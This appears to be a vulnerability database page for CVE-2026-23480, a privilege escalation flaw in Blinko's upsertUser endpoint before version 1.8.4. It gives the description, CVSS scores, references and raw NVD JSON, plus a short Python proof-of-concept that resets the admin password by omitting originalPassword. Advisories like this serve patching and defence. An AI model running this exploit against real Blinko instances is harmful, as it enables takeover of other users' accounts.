CVE-2026-23480

Description

Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is a privilege escalation vulnerability. The upsertUser endpoint has 3 issues: it is missing superAdminAuthMiddleware, any logged-in user can call it; the originalPassword is an optional parameter and if not provided password verification is skipped; there is no check for input.id === ctx.id (ownership verification). This could result in any authenticated user modifying other users' passwords, direct escalation to superadmin, and complete account takeover. This issue has been patched in version 1.8.4.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE

Blinko < 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
target_url = "http://target-domain.com/api/upsertUser"

# Attacker's session cookie (low privilege user)
cookies = {
    "token": "attacker_low_privilege_token"
}

# Payload to escalate privileges or reset admin password
# ID 1 is typically the admin, originalPassword is omitted to bypass check
payload = {
    "id": 1,
    "password": "new_admin_password"
}

response = requests.post(target_url, json=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] Privilege escalation successful! Admin password changed.")
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23480
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23480
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23480/
[4] VulDB https://vuldb.com/cve/CVE-2026-23480
[5] https://github.com/blinkospace/blinko/commit/3afbdf486b6f371bdac5781dea6289749f2c4c03
[6] https://github.com/blinkospace/blinko/releases/tag/1.8.4
[7] https://github.com/blinkospace/blinko/security/advisories/GHSA-r3mv-q7ww-86p6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23480", "sourceIdentifier": "[email protected]", "published": "2026-03-23T21:17:01.940", "lastModified": "2026-03-24T18:33:48.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is a privilege escalation vulnerability. The upsertUser endpoint has 3 issues: it is missing superAdminAuthMiddleware, any logged-in user can call it; the originalPassword is an optional parameter and if not provided password verification is skipped; there is no check for input.id === ctx.id (ownership verification). This could result in any authenticated user modifying other users' passwords, direct escalation to superadmin, and complete account takeover. This issue has been patched in version 1.8.4."}, {"lang": "es", "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. Antes de la versión 1.8.4, existe una vulnerabilidad de escalada de privilegios. El endpoint upsertUser tiene 3 problemas: le falta superAdminAuthMiddleware, cualquier usuario con sesión iniciada puede llamarlo; el originalPassword es un parámetro opcional y si no se proporciona, la verificación de contraseña se omite; no hay una verificación para input.id === ctx.id (verificación de propiedad). Esto podría resultar en que cualquier usuario autenticado modifique las contraseñas de otros usuarios, una escalada directa a superadministrador y una toma de control completa de la cuenta. Este problema ha sido parcheado en la versión 1.8.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.4", "matchCriteriaId": "31941A3D-C688-40DF-AA55-1AF9056275D0"}]}]}], "references": [{"url": "https://github.com/blinkospace/blinko/commit/3afbdf486b6f371bdac5781dea6289749f2c4c03", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/blinkospace/blinko/releases/tag/1.8.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-r3mv-q7ww-86p6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}